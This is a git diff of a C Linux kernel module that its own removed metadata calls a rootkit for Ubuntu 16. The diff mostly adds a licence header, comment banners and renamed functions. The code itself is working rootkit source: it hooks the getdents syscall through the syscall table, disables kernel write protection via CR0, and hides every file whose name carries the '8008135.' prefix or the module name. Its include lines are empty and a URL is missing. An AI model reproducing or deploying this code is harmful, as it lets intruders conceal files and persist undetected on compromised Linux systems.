diff --git a/8008135.c b/8008135.c
index a706335..0eb6a63 100644
--- a/8008135.c
+++ b/8008135.c
@@ -1,3 +1,24 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/**** Includes ***************************************************************
+*******************************************************************************/
#include
#include
#include
@@ -6,58 +27,97 @@
#include
#include "sysgen.h"
+
+/**** Defines *****************************************************************
+*******************************************************************************/
+
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
+
#define HIDE_PREFIX "8008135."
-#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1)
+#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
+
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
+/**** Modinfo ****************************************************************
+*******************************************************************************/
+MODULE_LICENSE("GPLv3");
+MODULE_AUTHOR("JanKoernerEnterprises");
+MODULE_DESCRIPTION("8008135");
+MODULE_VERSION("0.1");
+/**** type *******************************************************************
+*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
- unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
- char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+ unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
+ char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
-MODULE_AUTHOR("JKE");
-MODULE_LICENSE("GPL v2");
-MODULE_DESCRIPTION("RootKit for Ubuntu-16");
+typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count);
+
+/**** var ********************************************************************
+*******************************************************************************/
-typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
sys_getdents_t sys_getdents_orig = NULL;
-// our new getdents handler
-asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
+/*** FUNCTION ****************************************************************
+* NAME: sys_getdents_new
+* DESCRIPTION: function overriding the original getdents
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+asmlinkage long sys_getdents_new(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count) {
int boff;
struct linux_dirent* ent;
+
long ret = sys_getdents_orig(fd, dirent, count);
+
char* dbuf;
+
if (ret <= 0) {
return ret;
}
+
dbuf = (char*)dirent;
+
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
+
ent = (struct linux_dirent*)(dbuf + boff);
- if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
- || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it
+ // if it has hide prefix or module name anywhere, hide it
+ if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
+ || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
+
// remove this entry by copying everything after it forward
- memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
// and adjust the length reported
+ memcpy(dbuf + boff, dbuf + boff + ent->d_reclen,
+ ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
+
return ret;
}
-static int __init lkm_example_init(void) {
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_init
+* DESCRIPTION: initializing Kernel Module
+* PARAMETERS: -
+* RETURNS: int
+*******************************************************************************/
+static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
@@ -78,7 +138,14 @@ static int __init lkm_example_init(void) {
return 0;
}
-static void __exit lkm_example_exit(void) {
+
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_exit
+* DESCRIPTION: unloading Kernel Module
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
@@ -88,5 +155,7 @@ static void __exit lkm_example_exit(void) {
printk(KERN_INFO "Old syscall back\n");
}
-module_init(lkm_example_init);
-module_exit(lkm_example_exit);
\ No newline at end of file
+
+// Setting pointers to init-/exit-functions
+module_init(init_8008135);
+module_exit(exit_8008135);
\ No newline at end of file